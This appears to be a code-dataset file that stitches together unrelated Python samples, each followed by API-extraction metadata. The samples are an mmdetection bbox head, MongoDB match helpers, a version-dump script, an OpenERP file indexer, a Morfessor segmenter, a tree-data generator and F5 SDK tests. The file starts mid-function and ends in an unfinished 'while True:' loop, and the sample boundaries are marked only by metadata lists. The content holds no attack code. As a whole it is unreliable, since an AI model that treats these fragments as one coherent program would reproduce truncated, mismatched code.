return seq, score
def compute_max_subarrays_sequence(seq=None, score=None, min_subarray_size=None, max_subarray_size=None, output='minimal', margin=1):
# extract subarrays
for subarray in compute_iterated_maximum_subarray(seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, output=output, margin=margin):
yield subarray
def compute_max_subarrays(graph=None, min_subarray_size=None, max_subarray_size=None, output='minimal', margin=1):
seq, score = extract_sequence_and_score(graph)
for subarray in compute_max_subarrays_sequence(seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, output=output, margin=margin):
yield subarray
| [
"collections.defaultdict",
"numpy.mean"
] | [((3311, 3328), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3322, 3328), False, 'from collections import defaultdict\n'), ((4362, 4382), 'numpy.mean', 'np.mean', (['importances'], {}), '(importances)\n', (4369, 4382), True, 'import numpy as np\n')] |
import torch.nn as nn
from ..registry import HEADS
from ..utils import ConvModule
from .bbox_head import BBoxHead
import torch
import torch.nn.functional as F
import mmcv
from mmdet.core import mask_target, mask_bg_target, force_fp32, bbox_target, bbox_overlaps
from ..losses import accuracy
from ..builder import build_loss
@HEADS.register_module
class ConvFCBBoxHead_MH(BBoxHead):
"""More general bbox head, with shared conv and fc layers and two optional
separated branches.
/-> cls convs -> cls fcs -> cls
shared convs -> shared fcs
\-> reg convs -> reg fcs -> reg
""" # noqa: W605
def __init__(self,
num_shared_convs=0,
num_shared_fcs=0,
num_cls_convs=0,
num_cls_fcs=0,
num_reg_convs=0,
num_reg_fcs=0,
mask_channels=256,
using_mask = True,
with_IoU = False,
conv_out_channels=256,
fc_out_channels=1024,
proto_combine='con',
feature_reduce=False,
# mask_conv=3,
conv_cfg=None,
norm_cfg=None,
using_bg=False,
using_refine=True,
loss_iou = dict(type='MSELoss', loss_weight=0.5),
*args,
**kwargs):
super(ConvFCBBoxHead_MH, self).__init__(*args, **kwargs)
assert (num_shared_convs + num_shared_fcs + num_cls_convs +
num_cls_fcs + num_reg_convs + num_reg_fcs > 0)
if num_cls_convs > 0 or num_reg_convs > 0:
assert num_shared_fcs == 0
if not self.with_cls:
assert num_cls_convs == 0 and num_cls_fcs == 0
if not self.with_reg:
assert num_reg_convs == 0 and num_reg_fcs == 0
self.num_shared_convs = num_shared_convs
self.using_mask = using_mask
self.num_shared_fcs = num_shared_fcs
self.num_cls_convs = num_cls_convs
self.num_cls_fcs = num_cls_fcs
self.num_reg_convs = num_reg_convs
self.num_reg_fcs = num_reg_fcs
self.conv_out_channels = conv_out_channels
self.fc_out_channels = fc_out_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.using_bg = using_bg
self.using_refine = using_refine
self.with_IoU = with_IoU
self.mask_channels = mask_channels
self.proto_combine = proto_combine
self.feature_reduce = feature_reduce
if with_IoU:
self.iou_loss = build_loss(loss_iou)
# self.hint_conv = ConvModule(self.mask_channels, self.mask_channels, 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg)
# add shared convs and fcs
if self.proto_combine == 'None':
if self.feature_reduce:
self.reduce_con = ConvModule(self.in_channels, conv_out_channels - mask_channels, 1, conv_cfg=conv_cfg,
norm_cfg=norm_cfg)
else:
combine_channels = self.in_channels + self.mask_channels if proto_combine == 'con' else self.in_channels
self.combine = ConvModule(combine_channels, conv_out_channels, 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg)
# self.mask_conv = nn.ModuleList()
# for i in range(mask_conv):
# conv_m = ConvModule(1, 1, 3, padding=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg)
# self.mask_conv.append(conv_m)
self.shared_convs, self.shared_fcs, last_layer_dim = \
self._add_conv_fc_branch(
self.num_shared_convs, self.num_shared_fcs, self.in_channels,
True)
self.shared_out_channels = last_layer_dim
# add cls specific branch
self.cls_convs, self.cls_fcs, self.cls_last_dim = \
self._add_conv_fc_branch(
self.num_cls_convs, self.num_cls_fcs, self.shared_out_channels)
# add reg specific branch
self.reg_convs, self.reg_fcs, self.reg_last_dim = \
self._add_conv_fc_branch(
self.num_reg_convs, self.num_reg_fcs, self.shared_out_channels)
if self.num_shared_fcs == 0 and not self.with_avg_pool:
if self.num_cls_fcs == 0:
self.cls_last_dim *= self.roi_feat_area
if self.num_reg_fcs == 0:
self.reg_last_dim *= self.roi_feat_area
self.relu = nn.ReLU(inplace=True)
# reconstruct fc_cls and fc_reg since input channels are changed
if self.with_cls:
self.fc_cls = nn.Linear(self.cls_last_dim, self.num_classes)
if self.with_reg:
out_dim_reg = (4 if self.reg_class_agnostic else 4 *
self.num_classes)
self.fc_reg = nn.Linear(self.reg_last_dim, out_dim_reg)
if self.with_IoU:
self.IoU_reg = nn.Linear(self.reg_last_dim, self.num_classes)
def _add_conv_fc_branch(self,
num_branch_convs,
num_branch_fcs,
in_channels,
is_shared=False):
"""Add shared or separable branch
convs -> avg pool (optional) -> fcs
"""
last_layer_dim = in_channels
# add branch specific conv layers
branch_convs = nn.ModuleList()
if num_branch_convs > 0:
for i in range(num_branch_convs):
conv_in_channels = (
last_layer_dim if i == 0 else self.conv_out_channels)
branch_convs.append(
ConvModule(
conv_in_channels,
self.conv_out_channels,
3,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg))
last_layer_dim = self.conv_out_channels
# add branch specific fc layers
branch_fcs = nn.ModuleList()
if num_branch_fcs > 0:
# for shared branch, only consider self.with_avg_pool
# for separated branches, also consider self.num_shared_fcs
if (is_shared
or self.num_shared_fcs == 0) and not self.with_avg_pool:
last_layer_dim *= self.roi_feat_area
for i in range(num_branch_fcs):
fc_in_channels = (
last_layer_dim if i == 0 else self.fc_out_channels)
branch_fcs.append(
nn.Linear(fc_in_channels, self.fc_out_channels))
last_layer_dim = self.fc_out_channels
return branch_convs, branch_fcs, last_layer_dim
def init_weights(self):
super(ConvFCBBoxHead_MH, self).init_weights()
for module_list in [self.shared_fcs, self.cls_fcs, self.reg_fcs]:
for m in module_list.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_uniform_(m.weight)
nn.init.constant_(m.bias, 0)
# @force_fp32(apply_to=('cls_score', 'bbox_pred'))
# def loss(self,
# cls_score,
# bbox_pred,
# labels,
# label_weights,
# bbox_targets,
# bbox_weights,
# reduction_override=None):
# losses = dict()
# if cls_score is not None:
# avg_factor = max(torch.sum(label_weights > 0).float().item(), 1.)
# losses['loss_cls_refine'] = self.loss_cls(
# cls_score,
# labels,
# label_weights,
# avg_factor=avg_factor,
# reduction_override=reduction_override)
# losses['acc_refine'] = accuracy(cls_score, labels)
# if bbox_pred is not None:
# pos_inds = labels > 0
# if self.reg_class_agnostic:
# pos_bbox_pred = bbox_pred.view(bbox_pred.size(0), 4)[pos_inds]
# else:
# pos_bbox_pred = bbox_pred.view(bbox_pred.size(0), -1,
# 4)[pos_inds, labels[pos_inds]]
# losses['loss_bbox_refine'] = self.loss_bbox(
# pos_bbox_pred,
# bbox_targets[pos_inds],
# bbox_weights[pos_inds],
# avg_factor=bbox_targets.size(0),
# reduction_override=reduction_override)
# return losses
#TODO: add IoU target aquire and loss calculation
def get_iou_target(self, sampling_reuslt, bbox_pred, bbox_target):
pos_proposals = [res.pos_bboxes for res in sampling_reuslt]
pos_assigned_gt_inds = [
res.pos_gt_assigned_gt_inds for res in sampling_reuslt
]
# bbox_overlaps()
def get_mask_target(self, sampling_results, gt_masks, rcnn_train_cfg):
# pos_proposals = [res.pos_bboxes for res in sampling_results]
# pos_assigned_gt_inds = [
# res.pos_assigned_gt_inds for res in sampling_results
# ]
# mask_targets = mask_target(pos_proposals, pos_assigned_gt_inds,
# gt_masks, rcnn_train_cfg)
proposals = [res.bboxes for res in sampling_results]
assigned_gt_inds = [
res.inds for res in sampling_results
]
mask_targets = mask_target(proposals, assigned_gt_inds,
gt_masks, rcnn_train_cfg)
mask_bg_targets = mask_bg_target(proposals, gt_masks, rcnn_train_cfg)
return mask_targets, mask_bg_targets
# def get_target(self, sampling_results, gt_bboxes, gt_labels,
# rcnn_train_cfg):
# pos_proposals = [res.pos_bboxes for res in sampling_results]
# neg_proposals = [torch.tensor([]) for res in sampling_results]
# pos_gt_bboxes = [res.pos_gt_bboxes for res in sampling_results]
# pos_gt_labels = [res.pos_gt_labels for res in sampling_results]
# reg_classes = 1 if self.reg_class_agnostic else self.num_classes
# cls_reg_targets = bbox_target(
# pos_proposals,
# neg_proposals,
# pos_gt_bboxes,
# pos_gt_labels,
# rcnn_train_cfg,
# reg_classes,
# target_means=self.target_means,
# target_stds=self.target_stds)
# return cls_reg_targets
def forward(self, x, mask_pred):
# shared part
if self.using_mask:
# for conv in self.mask_conv:
# mask_pred = conv(mask_pred)
# mask_pred = self.hint_conv(mask_pred)
if self.proto_combine == 'con':
x = torch.cat([x, mask_pred], dim=1)
x = self.combine(x)
elif self.proto_combine == 'sum':
x = x + mask_pred
x = self.combine(x)
else:
x = self.reduce_con(x)
x = torch.cat([x, mask_pred], dim=1)
if self.num_shared_convs > 0:
for conv in self.shared_convs:
x = conv(x)
if self.num_shared_fcs > 0:
if self.with_avg_pool:
x = self.avg_pool(x)
x = x.view(x.size(0), -1)
for fc in self.shared_fcs:
x = self.relu(fc(x))
# separate branches
x_cls = x
x_reg = x
for conv in self.cls_convs:
x_cls = conv(x_cls)
if x_cls.dim() > 2:
if self.with_avg_pool:
x_cls = self.avg_pool(x_cls)
x_cls = x_cls.view(x_cls.size(0), -1)
for fc in self.cls_fcs:
x_cls = self.relu(fc(x_cls))
for conv in self.reg_convs:
x_reg = conv(x_reg)
if x_reg.dim() > 2:
if self.with_avg_pool:
x_reg = self.avg_pool(x_reg)
x_reg = x_reg.view(x_reg.size(0), -1)
for fc in self.reg_fcs:
x_reg = self.relu(fc(x_reg))
cls_score = self.fc_cls(x_cls) if self.with_cls else None
bbox_pred = self.fc_reg(x_reg) if self.with_reg else None
if self.with_IoU:
IoU_pred = self.IoU_reg(x_reg)
return cls_score, bbox_pred, IoU_pred
return cls_score, bbox_pred
@HEADS.register_module
class SharedFCBBoxHead_MH(ConvFCBBoxHead_MH):
def __init__(self, num_fcs=2, fc_out_channels=1024, *args, **kwargs):
assert num_fcs >= 1
super(SharedFCBBoxHead_MH, self).__init__(
num_shared_convs=0,
num_shared_fcs=num_fcs,
num_cls_convs=0,
num_cls_fcs=0,
num_reg_convs=0,
num_reg_fcs=0,
fc_out_channels=fc_out_channels,
*args,
**kwargs)
| [
"torch.nn.ReLU",
"torch.nn.ModuleList",
"torch.nn.init.xavier_uniform_",
"mmdet.core.mask_target",
"torch.cat",
"torch.nn.init.constant_",
"torch.nn.Linear",
"mmdet.core.mask_bg_target"
] | [((4509, 4530), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (4516, 4530), True, 'import torch.nn as nn\n'), ((5421, 5436), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (5434, 5436), True, 'import torch.nn as nn\n'), ((6058, 6073), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (6071, 6073), True, 'import torch.nn as nn\n'), ((9418, 9484), 'mmdet.core.mask_target', 'mask_target', (['proposals', 'assigned_gt_inds', 'gt_masks', 'rcnn_train_cfg'], {}), '(proposals, assigned_gt_inds, gt_masks, rcnn_train_cfg)\n', (9429, 9484), False, 'from mmdet.core import mask_target, mask_bg_target, force_fp32, bbox_target, bbox_overlaps\n'), ((9546, 9597), 'mmdet.core.mask_bg_target', 'mask_bg_target', (['proposals', 'gt_masks', 'rcnn_train_cfg'], {}), '(proposals, gt_masks, rcnn_train_cfg)\n', (9560, 9597), False, 'from mmdet.core import mask_target, mask_bg_target, force_fp32, bbox_target, bbox_overlaps\n'), ((4656, 4702), 'torch.nn.Linear', 'nn.Linear', (['self.cls_last_dim', 'self.num_classes'], {}), '(self.cls_last_dim, self.num_classes)\n', (4665, 4702), True, 'import torch.nn as nn\n'), ((4865, 4906), 'torch.nn.Linear', 'nn.Linear', (['self.reg_last_dim', 'out_dim_reg'], {}), '(self.reg_last_dim, out_dim_reg)\n', (4874, 4906), True, 'import torch.nn as nn\n'), ((4960, 5006), 'torch.nn.Linear', 'nn.Linear', (['self.reg_last_dim', 'self.num_classes'], {}), '(self.reg_last_dim, self.num_classes)\n', (4969, 5006), True, 'import torch.nn as nn\n'), ((10747, 10779), 'torch.cat', 'torch.cat', (['[x, mask_pred]'], {'dim': '(1)'}), '([x, mask_pred], dim=1)\n', (10756, 10779), False, 'import torch\n'), ((6605, 6652), 'torch.nn.Linear', 'nn.Linear', (['fc_in_channels', 'self.fc_out_channels'], {}), '(fc_in_channels, self.fc_out_channels)\n', (6614, 6652), True, 'import torch.nn as nn\n'), ((7026, 7059), 'torch.nn.init.xavier_uniform_', 'nn.init.xavier_uniform_', (['m.weight'], {}), '(m.weight)\n', (7049, 7059), True, 'import torch.nn as nn\n'), ((7080, 7108), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bias', '(0)'], {}), '(m.bias, 0)\n', (7097, 7108), True, 'import torch.nn as nn\n'), ((11009, 11041), 'torch.cat', 'torch.cat', (['[x, mask_pred]'], {'dim': '(1)'}), '([x, mask_pred], dim=1)\n', (11018, 11041), False, 'import torch\n')] |
#!/usr/bin/python3
from services.loggerServices.loggerService import LoggerService
logger = LoggerService().logger
def create_match(self, data):
return self.client.FMT["matches"].insert_one(data).inserted_id
def update_match(self, data):
return self.client.FMT["matches"].update_one(data, upsert=True).inserted_id
def find_match(self, data):
return self.client.FMT["matches"].find_one(data)
def parse_match_from_request(request):
return {
"home_team": request.get("home_team"),
"away_team": request.get("away_team"),
"date": request.get("date")
}
def parse_ended_match_from_request(request):
match = parse_match_from_request(request)
match["score"] = request.get("score").replace(' ', '')
return match
def parse_ended_match_to_db(request):
parsed_match = {
"home_team": request.get("home_team"),
"away_team": request.get("away_team"),
"date": request.get("date"),
"score": request.get("score")
}
home_team_score = parsed_match["score"].split('-')[0]
away_team_score = parsed_match["score"].split('-')[1]
# parse match result
if home_team_score == away_team_score:
parsed_match['is_draw'] = True
parsed_match['team_won_score'] = home_team_score
else:
parsed_match['is_draw'] = False
if home_team_score > away_team_score:
parsed_match['team_won'] = parsed_match['home_team']
parsed_match['team_won_score'] = home_team_score
parsed_match['team_lost'] = parsed_match['away_team']
parsed_match['team_lose_score'] = away_team_score
else:
parsed_match['team_won'] = parsed_match['away_team']
parsed_match['team_won_score'] = away_team_score
parsed_match['team_lost'] = parsed_match['home_team']
parsed_match['team_lose_score'] = home_team_score
return parsed_match
def parse_match_from_db(request):
return {
"id": str(request.get("_id")),
"home_team": request.get("home_team"),
"away_team": request.get("away_team"),
"date": request.get("date", None),
"score": request.get("score", None),
"is_draw": request.get("is_draw", None),
"team_won": request.get("team_won", None),
"team_lost": request.get("team_lost", None)
}
| [
"services.loggerServices.loggerService.LoggerService"
] | [((93, 108), 'services.loggerServices.loggerService.LoggerService', 'LoggerService', ([], {}), '()\n', (106, 108), False, 'from services.loggerServices.loggerService import LoggerService\n')] |
#!/usr/bin/env python3
import json
import logging
import os
import re
import subprocess # nosec
import sys
from typing import Dict, Optional, Tuple, cast
SRC_VERSION_RE = re.compile(r"^.*\(([^=]*)===?([^=]*)\)$")
VERSION_RE = re.compile(r"^([^=]*)==([^=]*)$")
LOG = logging.getLogger(__name__)
def _get_package_version(comp: str) -> Tuple[Optional[str], Optional[str]]:
"""
Parse plain and editable versions.
See test_genversion.py for examples.
"""
src_matcher = SRC_VERSION_RE.match(comp)
matcher = src_matcher or VERSION_RE.match(comp)
if matcher:
return cast(Tuple[str, str], matcher.groups())
else:
if len(comp) > 0 and not comp[:3] == "-e ":
print("Cannot parse package version: " + comp)
return None, None
def _get_packages_version() -> Dict[str, str]:
result = {}
with open(os.devnull, "w", encoding="utf-8") as devnull:
for comp in (
subprocess.check_output(["python3", "-m", "pip", "freeze"], stderr=devnull) # nosec
.decode()
.strip()
.split("\n")
):
name, version = _get_package_version(comp)
if name is not None and version is not None:
result[name] = version
return result
def deprecated() -> None:
"""Run the command and print a deprecated notice."""
LOG.warning("c2cwsgiutils_genversion.py is deprecated; use c2cwsgiutils-genversion instead")
return main()
def main() -> None:
"""Run the command."""
if len(sys.argv) == 2:
git_tag = None
git_hash = sys.argv[1]
else:
git_tag = sys.argv[1]
git_hash = sys.argv[2]
report = {"main": {"git_hash": git_hash}, "packages": _get_packages_version()}
if git_tag is not None:
report["main"]["git_tag"] = git_tag
with open("versions.json", "w", encoding="utf-8") as file:
json.dump(report, file, indent=2)
if __name__ == "__main__":
main()
| [
"json.dump",
"subprocess.check_output",
"logging.getLogger",
"re.compile"
] | [((173, 215), 're.compile', 're.compile', (['"""^.*\\\\(([^=]*)===?([^=]*)\\\\)$"""'], {}), "('^.*\\\\(([^=]*)===?([^=]*)\\\\)$')\n", (183, 215), False, 'import re\n'), ((228, 260), 're.compile', 're.compile', (['"""^([^=]*)==([^=]*)$"""'], {}), "('^([^=]*)==([^=]*)$')\n", (238, 260), False, 'import re\n'), ((268, 295), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (285, 295), False, 'import logging\n'), ((1906, 1939), 'json.dump', 'json.dump', (['report', 'file'], {'indent': '(2)'}), '(report, file, indent=2)\n', (1915, 1939), False, 'import json\n'), ((946, 1021), 'subprocess.check_output', 'subprocess.check_output', (["['python3', '-m', 'pip', 'freeze']"], {'stderr': 'devnull'}), "(['python3', '-m', 'pip', 'freeze'], stderr=devnull)\n", (969, 1021), False, 'import subprocess\n')] |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
import os
import tempfile
from subprocess import Popen, PIPE
_logger = logging.getLogger(__name__)
class NhException(Exception):
pass
class indexer(object):
""" An indexer knows how to parse the content of some file.
Typically, one indexer should be instantiated per file
type.
Override this class to add more functionality. Note that
you should only override the Content or the File methods
that give an optimal result. """
def _getMimeTypes(self):
""" Return supported mimetypes """
return []
def _getExtensions(self):
return []
def _getDefMime(self, ext):
""" Return a mimetype for this document type, ideally the
closest to the extension ext. """
mts = self._getMimeTypes();
if len (mts):
return mts[0]
return None
def indexContent(self, content, filename=None, realfile=None):
""" Use either content or the real file, to index.
Some parsers will work better with the actual
content, others parse a file easier. Try the
optimal.
"""
res = ''
try:
if content != None:
return self._doIndexContent(content)
except NhException:
pass
if realfile != None:
try:
return self._doIndexFile(realfile)
except NhException:
pass
fp = open(realfile,'rb')
try:
content2 = fp.read()
finally:
fp.close()
# The not-handled exception may be raised here
return self._doIndexContent(content2)
# last try, with a tmp file
if content:
try:
fname,ext = filename and os.path.splitext(filename) or ('','')
fd, rfname = tempfile.mkstemp(suffix=ext)
os.write(fd, content)
os.close(fd)
res = self._doIndexFile(rfname)
os.unlink(rfname)
return res
except NhException:
pass
raise NhException('No appropriate method to index file.')
def _doIndexContent(self, content):
raise NhException("Content cannot be handled here.")
def _doIndexFile(self, fpath):
raise NhException("Content cannot be handled here.")
def __repr__(self):
return "<indexer %s.%s>" %(self.__module__, self.__class__.__name__)
def mime_match(mime, mdict):
if mdict.has_key(mime):
return (mime, mdict[mime])
if '/' in mime:
mpat = mime.split('/')[0]+'/*'
if mdict.has_key(mpat):
return (mime, mdict[mpat])
return (None, None)
class contentIndex(object):
def __init__(self):
self.mimes = {}
self.exts = {}
def register(self, obj):
f = False
for mime in obj._getMimeTypes():
self.mimes[mime] = obj
f = True
for ext in obj._getExtensions():
self.exts[ext] = obj
f = True
if f:
_logger.debug('Register content indexer: %r.', obj)
if not f:
raise Exception("Your indexer should at least support a mimetype or extension.")
def doIndex(self, content, filename=None, content_type=None, realfname=None, debug=False):
fobj = None
fname = None
mime = None
if content_type and self.mimes.has_key(content_type):
mime = content_type
fobj = self.mimes[content_type]
elif filename:
bname,ext = os.path.splitext(filename)
if self.exts.has_key(ext):
fobj = self.exts[ext]
mime = fobj._getDefMime(ext)
if content_type and not fobj:
mime,fobj = mime_match(content_type, self.mimes)
if not fobj:
try:
if realfname :
fname = realfname
else:
try:
bname,ext = os.path.splitext(filename or 'test.tmp')
except Exception:
bname, ext = filename, 'tmp'
fd, fname = tempfile.mkstemp(suffix=ext)
os.write(fd, content)
os.close(fd)
pop = Popen(['file','-b','--mime',fname], shell=False, stdout=PIPE)
(result, _) = pop.communicate()
mime2 = result.split(';')[0]
_logger.debug('File gives us: %s', mime2)
# Note that the temporary file still exists now.
mime,fobj = mime_match(mime2, self.mimes)
if not mime:
mime = mime2
except Exception:
_logger.exception('Cannot determine mime type.')
try:
if fobj:
res = (mime, fobj.indexContent(content,filename,fname or realfname) )
else:
_logger.debug("Have no object, return (%s, None).", mime)
res = (mime, '')
except Exception:
_logger.exception("Cannot index file %s (%s).",
filename, fname or realfname)
res = (mime, '')
# If we created a tmp file, unlink it now
if not realfname and fname:
try:
os.unlink(fname)
except Exception:
_logger.exception("Cannot unlink %s.", fname)
return res
cntIndex = contentIndex()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"subprocess.Popen",
"os.unlink",
"tempfile.mkstemp",
"os.close",
"os.path.splitext",
"os.write",
"logging.getLogger"
] | [((1064, 1091), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1081, 1091), False, 'import logging\n'), ((2877, 2905), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': 'ext'}), '(suffix=ext)\n', (2893, 2905), False, 'import tempfile\n'), ((2922, 2943), 'os.write', 'os.write', (['fd', 'content'], {}), '(fd, content)\n', (2930, 2943), False, 'import os\n'), ((2960, 2972), 'os.close', 'os.close', (['fd'], {}), '(fd)\n', (2968, 2972), False, 'import os\n'), ((3037, 3054), 'os.unlink', 'os.unlink', (['rfname'], {}), '(rfname)\n', (3046, 3054), False, 'import os\n'), ((4625, 4651), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (4641, 4651), False, 'import os\n'), ((5356, 5420), 'subprocess.Popen', 'Popen', (["['file', '-b', '--mime', fname]"], {'shell': '(False)', 'stdout': 'PIPE'}), "(['file', '-b', '--mime', fname], shell=False, stdout=PIPE)\n", (5361, 5420), False, 'from subprocess import Popen, PIPE\n'), ((6397, 6413), 'os.unlink', 'os.unlink', (['fname'], {}), '(fname)\n', (6406, 6413), False, 'import os\n'), ((5229, 5257), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': 'ext'}), '(suffix=ext)\n', (5245, 5257), False, 'import tempfile\n'), ((5278, 5299), 'os.write', 'os.write', (['fd', 'content'], {}), '(fd, content)\n', (5286, 5299), False, 'import os\n'), ((5320, 5332), 'os.close', 'os.close', (['fd'], {}), '(fd)\n', (5328, 5332), False, 'import os\n'), ((2810, 2836), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (2826, 2836), False, 'import os\n'), ((5065, 5105), 'os.path.splitext', 'os.path.splitext', (["(filename or 'test.tmp')"], {}), "(filename or 'test.tmp')\n", (5081, 5105), False, 'import os\n')] |
#!/usr/bin/env python3
from __future__ import print_function
import morfessor
import sys
import logging
import lzma
import os
import math
def main(allowed_chars_file, model):
allowed_chars = {line.strip() for line in open(allowed_chars_file, encoding='utf-8') if len(line.strip()) == 1}
model = morfessor.MorfessorIO().read_any_model(model)
for line in sys.stdin:
word = line.strip()
parts = model.viterbi_segment(word)[0]
print(word,end=' ')
print(" ".join(parts).replace("<unk>", "<UNK>"))
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
if len(sys.argv) != 3:
print("usage: python3 create_morf_wordmap.py <allowe-characters-file> <morfessor-model> < word-list")
print("e.g.: python3 create_morf_wordmap.py data/kws_prep/allowed_chars data/kws_prep/morf/model.bin < data/kws_prep/dev.words")
print("This script prints a stdout word and its morpheme constituents according to the morfessor.")
sys.exit(-1)
main(sys.argv[1],sys.argv[2])
| [
"morfessor.MorfessorIO",
"sys.exit",
"logging.basicConfig"
] | [((575, 614), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (594, 614), False, 'import logging\n'), ((1005, 1017), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (1013, 1017), False, 'import sys\n'), ((309, 332), 'morfessor.MorfessorIO', 'morfessor.MorfessorIO', ([], {}), '()\n', (330, 332), False, 'import morfessor\n')] |
from __future__ import print_function
from create_tree import *
import numpy as np
import random
DATA_DIR = "../data/"
def curriculum_depth(i, num_examples, max_depth):
curriculum_max_depth= int((max_depth*i)/num_examples)
#print(i, curriculum_max_depth,)
if curriculum_max_depth > 0:
random_depth = 2 + np.random.randint(curriculum_max_depth)
else:
random_depth = 2
#print("DEPTH = ", random_depth)
return random_depth
def copy_t2t(depth):
my_tree = generate_data(depth-1)
change_nts(my_tree)
my_list = convert_to_list_inorder(my_tree,[])
infix_tree = ' '.join(str(e) for e in my_list)
#print my_tree
return ([infix_tree, infix_tree])
def create_examples(num_examples, max_depth, function):
data = []
for i in range(num_examples):
depth = max_depth
if np.random.randint(2) == 0:
depth = curriculum_depth(i, num_examples, max_depth)
data.append(function(depth))
return data
if __name__ == "__main__":
num_examples = 1000
max_depth = 5
data_subset = "train"
t2t_operation = "COPY"
seed = 0
#NOTE: we need both -- for reproducible trees...
#numpy.random.seed(seed)
#random.seed(seed)
if t2t_operation == "COPY":
data = create_examples(num_examples,max_depth, function=copy_t2t)
trans = open(DATA_DIR + data_subset + '.copy', 'w')
elif t2t_operation == "RELABEL_1":
data = create_examples(num_examples,max_depth, function=copy_t2t)
trans = open(DATA_DIR + data_subset + '.copy', 'w')
orig = open(DATA_DIR + data_subset + '.orig', 'w')
for i in range(num_examples):
print(data[i][0], file=orig)
print(data[i][1], file=trans)
#orig_vocab = open(DATA_DIR + 'vocab.train.orig', 'w')
#trans_vocab = open(DATA_DIR + 'vocab.train.copy', 'w')
#max_num = 256
#operators = ['+','-','*','/']
#for i in range(1, max_num+1):
# print >> orig_vocab, i, i
# print >> trans_vocab, i, i
#for i in range(len(operators)):
# print >> orig_vocab, operators[i], max_num+i+1
# print >> trans_vocab, operators[i], max_num+i+1
#print >> orig_vocab, '(', max_num + len(operators) + 1
#print >> orig_vocab, ')', max_num + len(operators) + 2
#print >> trans_vocab, '(', max_num + len(operators) + 1
#print >> trans_vocab, ')', max_num + len(operators) + 2
| [
"numpy.random.randint"
] | [((326, 365), 'numpy.random.randint', 'np.random.randint', (['curriculum_max_depth'], {}), '(curriculum_max_depth)\n', (343, 365), True, 'import numpy as np\n'), ((857, 877), 'numpy.random.randint', 'np.random.randint', (['(2)'], {}), '(2)\n', (874, 877), True, 'import numpy as np\n')] |
# Copyright 2015 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from distutils.version import LooseVersion
from requests.exceptions import HTTPError
pytestmark = pytest.mark.skipif(
LooseVersion(pytest.config.getoption('--release'))
< LooseVersion('12.0.0'),
reason='Needs v12 TMOS or greater to pass.'
)
@pytest.fixture(scope='function')
def iapp_lx(mgmt_root):
fake_iapp_name = 'foo-iapp.rpm'
sio = StringIO(80*'a')
ftu = mgmt_root.shared.file_transfer.uploads
ftu.upload_stringio(sio, fake_iapp_name, chunk_size=20)
yield fake_iapp_name
tpath_name = '/var/config/rest/downloads/{0}'.format(fake_iapp_name)
mgmt_root.tm.util.unix_rm.exec_cmd('run', utilCmdArgs=tpath_name)
@pytest.fixture(scope='function')
def pkg_task(mgmt_root, iapp_lx):
collection = mgmt_root.shared.iapp.package_management_tasks_s
task = collection.package_management_task.create(
operation='INSTALL',
packageFilePath='/var/config/rest/downloads/foo-iapp.rpm'
)
yield task
@pytest.fixture(scope='function')
def pkg_query_task(mgmt_root, iapp_lx):
collection = mgmt_root.shared.iapp.package_management_tasks_s
task = collection.package_management_task.create(
operation='QUERY'
)
yield task
class TestPackageManagementTasks(object):
def test_create_task(self, pkg_task):
assert pkg_task.operation == "INSTALL"
assert pkg_task.kind == \
'shared:iapp:package-management-tasks:iapppackagemanagementtaskstate' # NOQA
def test_load_no_task(self, mgmt_root):
with pytest.raises(HTTPError) as err:
collection = mgmt_root.shared.iapp.package_management_tasks_s
collection.package_management_task.load(
id='asdasdasd'
)
assert err.value.response.status_code == 404
def test_load(self, mgmt_root, pkg_task):
collection = mgmt_root.shared.iapp.package_management_tasks_s
resource = collection.package_management_task.load(id=pkg_task.id)
assert pkg_task.id == resource.id
assert pkg_task.selfLink == resource.selfLink
def test_exists(self, mgmt_root, pkg_task):
pid = str(pkg_task.id)
collection = mgmt_root.shared.iapp.package_management_tasks_s
exists = collection.package_management_task.exists(id=pid)
assert exists is True
def test_cancel(self, pkg_task):
pkg_task.cancel()
assert pkg_task.__dict__['canceled']
def test_delete(self, pkg_task):
pkg_task.cancel()
while True:
